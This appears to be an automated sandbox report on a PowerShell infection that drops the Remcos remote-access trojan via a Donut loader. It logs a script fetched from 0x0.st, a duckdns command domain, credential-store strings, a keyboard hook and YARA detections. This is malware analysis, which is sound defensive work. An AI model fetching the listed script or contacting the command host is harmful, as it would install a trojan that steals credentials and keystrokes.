                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                          Source: powershell.exe, powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                          Source: powershell.exe, 0000000D.00000002.2284366833.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                          Source: global trafficDNS traffic detected: DNS query: 0x0.st
                          Source: global trafficDNS traffic detected: DNS query: abokirem.duckdns.org
                          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                          Source: powershell.exe, 00000017.00000002.2410234878.00000000078AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2567824299.000000000779F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2897148363.0000000006D7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.3470461040.00000000077F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.4117289529.0000000006E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                          Source: powershell.exe, 0000002C.00000002.3100494644.0000000007660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microN
                          Source: powershell.exe, 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000017.00000002.2416886326.000000000904C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2582377571.0000000008F5C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000022.00000002.2751486587.0000000008A8C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000027.00000002.2925202742.000000000863C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002C.00000002.3139004207.0000000008EEC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000031.00000002.3395971094.0000000008E8C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000036.00000002.3545950157.00000000090EC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000003B.00000002.3891764993.000000000946C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000040.00000002.4282483846.000000000870C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000045.00000002.4705414625.00000000086AC000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                          Source: powershell.exe, 0000000A.00000002.2237637959.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2372507316.0000000005145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2511956912.0000000004F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2649934209.0000000004B25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2789793665.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2969178304.0000000004F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3113584906.0000000005095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.3255281017.0000000005121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.3419752183.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3583528299.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.3785761883.0000000004840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                          Source: powershell.exe, powershell.exe, 00000012.00000002.2280175670.00000000031EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                          Source: powershell.exe, 00000012.00000002.2280175670.00000000031EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                          Source: powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                          Source: powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                          Source: powershell.exe, 0000000D.00000002.2285078990.00000000028A4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                          Source: powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                          Source: powershell.exe, 0000000A.00000002.2237637959.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2372507316.0000000005295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2511956912.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2649934209.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2789793665.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2969178304.0000000005085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3113584906.00000000051E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.3255281017.0000000005264000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.3419752183.0000000004F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3583528299.0000000004A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.3785761883.0000000004985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
                          Source: powershell.exe, 00000045.00000002.3785761883.0000000004985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1
                          Source: powershell.exe, 0000000A.00000002.2237637959.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2372507316.0000000005145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2511956912.0000000004F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2649934209.0000000004B25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2789793665.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2969178304.0000000004F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3113584906.0000000005095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.3255281017.0000000005121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.3419752183.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3583528299.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.3785761883.0000000004840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                          Source: powershell.exe, 0000000D.00000002.2285400477.0000000002B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                          Source: powershell.exe, 0000000D.00000002.2285400477.0000000002B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                          Source: powershell.exe, 0000000D.00000002.2285400477.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?cl
                          Source: powershell.exe, 0000000D.00000002.2285400477.0000000002B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                          Source: powershell.exe, powershell.exe, 00000012.00000002.2278400653.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49704 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49706 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49775 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49860 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49985 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49987 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49989 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49990 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49991 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49993 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49994 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49995 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49996 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49997 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49999 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,18_2_0040BA30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR

                          E-Banking Fraud

                          barindex
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000002.2751486587.0000000008A87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2252250805.0000000007437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3849765879.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3123710586.0000000008723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4282483846.0000000008707000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3517844786.0000000008AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3139004207.0000000008EE7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3521971926.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.2740109130.0000000008561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2577352879.00000000089BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4705414625.00000000086A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2897148363.0000000006D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3545950157.00000000090E7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3891764993.0000000009467000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2409566174.0000000007820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3788098301.000000000769E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2925202742.0000000008637000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4640955762.0000000007E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4202711770.0000000007E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3395971094.0000000008E87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2416886326.0000000009047000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2582377571.0000000008F57000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3369936433.00000000086E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: powershell.exeProcess created: 46
                          Source: cmd.exeProcess created: 48

                          System Summary

                          barindex
                          Source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 0000000A.00000002.2258141973.000000000B4F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000004F.00000002.4760119344.000000000651F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000022.00000002.2751486587.0000000008A8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000000A.00000002.2241922716.0000000005E72000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000022.00000002.2680024924.0000000005BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000027.00000002.2852063246.0000000005AEA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000000A.00000002.2241212776.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000031.00000002.3210939044.00000000061AC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000003B.00000002.3567174204.0000000005E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000040.00000002.3807374155.000000000599E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000031.00000002.3395971094.0000000008E8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000027.00000002.2925202742.000000000863C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000002C.00000002.3139004207.0000000008EEC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000004F.00000002.4718019503.00000000064B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000003B.00000002.3891764993.000000000946C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000002C.00000002.3033612985.000000000604C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000031.00000002.3206103808.000000000610C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000017.00000002.2417263077.000000000B815000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000045.00000002.4705414625.00000000086AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000001C.00000002.2582377571.0000000008F5C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000040.00000002.4282483846.000000000870C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000001C.00000002.2582925458.000000000B6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000004A.00000002.4498388098.000000000594F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000002C.00000002.3028999049.0000000005FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000003B.00000002.3579003629.0000000005EEE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000004A.00000002.4442121691.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000022.00000002.2682678594.0000000005C41000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000036.00000002.3545950157.00000000090EC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000017.00000002.2391539936.000000000644E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000040.00000002.3828451167.0000000005A3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000022.00000002.2752861386.000000000B251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000017.00000002.2416886326.000000000904C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
